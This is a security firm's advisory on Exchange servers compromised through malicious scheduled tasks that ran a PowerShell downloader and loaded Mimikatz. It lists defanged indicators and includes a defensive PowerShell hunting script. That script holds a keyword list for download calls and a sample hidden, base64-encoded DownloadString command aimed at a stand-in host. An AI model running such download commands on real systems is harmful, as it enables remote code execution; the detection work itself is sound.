Under Attack? Breach Response Hotline: Call 833.997.7327 (US/CAN)
Huntress Labs has discovered multiple partners whose Exchange servers received malicious scheduled tasks that executed a PowerShell downloader from hxxp://p.estonine[.]com/p?e. According to Huntress Labs CEO Kyle Hanslovan, the server is hosted on Digital Ocean, resolves to the IP address 188.166.162[.]201, and delivers a base64-encoded PowerShell script.
This PowerShell script is similar to a coin miner campaign discovered by Carbon Black in 2019.
Huntress Labs reported their findings to Digital Ocean and the accompanying registrar, NameCheap. After this, they discovered a fifth stage in the malware in which two Mimikatz DLLs embedded within the script are loaded or injected. Huntress has discovered over 200 Exchange servers compromised due to the vulnerabilities.
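A hunting check for the scheduled-task behaviour described above, added here as an example and not Huntress Labs' or SpearTip's code: it flags task actions that reference the two indicators quoted on this page or that launch PowerShell with a download call, including when the command is hidden in a base64 `-EncodedCommand` argument, which goes beyond the plain-text case. The function names, the keyword list and the sample action are assumptions made for illustration.

```powershell
# Indicators as quoted on this page, stored defanged and refanged only in memory.
$Indicators = @('p.estonine[.]com', '188.166.162[.]201') |
    ForEach-Object { $_.Replace('[.]', '.') }

function Get-DecodedCommand {
    # Decodes a -e / -ec / -enc / -EncodedCommand argument (base64 of UTF-16LE text).
    param([string]$Arguments)
    if ($Arguments -match '(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }   # token was not valid base64
    }
    return $null
}

function Test-TaskAction {
    # Returns the reasons a task action is suspicious; returns nothing when it is clean.
    param([string]$Execute, [string]$Arguments)
    $reasons = @()
    $text    = "$Execute $Arguments"
    $decoded = Get-DecodedCommand $Arguments
    if ($decoded) { $text += "`n$decoded"; $reasons += 'encoded PowerShell command' }
    foreach ($ioc in $Indicators) {
        if ($text.IndexOf($ioc, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
            $reasons += "references indicator $($ioc.Replace('.', '[.]'))"
        }
    }
    # Assumed keyword list for common PowerShell download calls (hypothetical, tune locally).
    if ($text -match 'powershell|pwsh' -and
        $text -match 'downloadstring|downloadfile|net\.webclient|invoke-webrequest') {
        $reasons += 'PowerShell download call'
    }
    return $reasons
}

# Constructed sample action (not from a real host) so the check can be seen working offline.
$payload = "(New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
Test-TaskAction 'powershell.exe' "-NoP -W Hidden -enc $encoded"

# Live sweep: every action of every scheduled task on this server.
if (Get-Command Get-ScheduledTask -ErrorAction SilentlyContinue) {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $hit = Test-TaskAction $action.Execute $action.Arguments
            if ($hit) {
                [pscustomobject]@{ Task    = "$($task.TaskPath)$($task.TaskName)"
                                   Reasons = $hit -join '; ' }
            }
        }
    }
}
```

Run it from an elevated session so tasks registered under SYSTEM are visible; a hit is a lead for review, since legitimate management tools also schedule encoded PowerShell.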
SpearTip’s professionals are closely monitoring this situation as it develops. If you have any questions regarding the Exchange Server vulnerabilities, don’t hesitate to reach out to our Security Operations Center at 833.997.7327.
Main Office: 800.236.6550
1714 Deer Tracks Trail, Suite 150
St. Louis, MO 63131
©2024 SpearTip, LLC. All rights reserved.